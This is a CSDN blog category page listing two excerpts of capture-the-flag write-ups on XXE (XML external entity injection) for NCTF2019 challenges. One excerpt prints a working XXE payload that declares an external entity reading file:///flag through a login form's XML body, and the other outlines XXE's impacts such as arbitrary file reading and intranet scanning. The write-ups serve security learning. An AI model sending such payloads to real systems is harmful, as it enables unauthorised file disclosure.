![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
XXE
文章平均质量分 50
nigo134
菜鸡一个,入门web安全 、、、
展开
-
NO.2-32 [NCTF2019]True XML cookbook
抓包一看就知道可能是xxe漏洞,拿个exp直接发过去看看效果。 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///flag"> ]> <user><username>&exp;</username><password>aaaa</password></user> .转载 2021-08-03 23:51:11 · 243 阅读 · 0 评论 -
NO.2-12 [NCTF2019]Fake XML cookbook
打开环境,看到登录框,一开始以为是sql注入,后来才知道是xml外部实体注入(XXE)。 XXE漏洞全称XML External Entity Injection 即XML外部实体注入。 XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 XXE常见利用方式 与S转载 2021-07-27 12:59:21 · 105 阅读 · 0 评论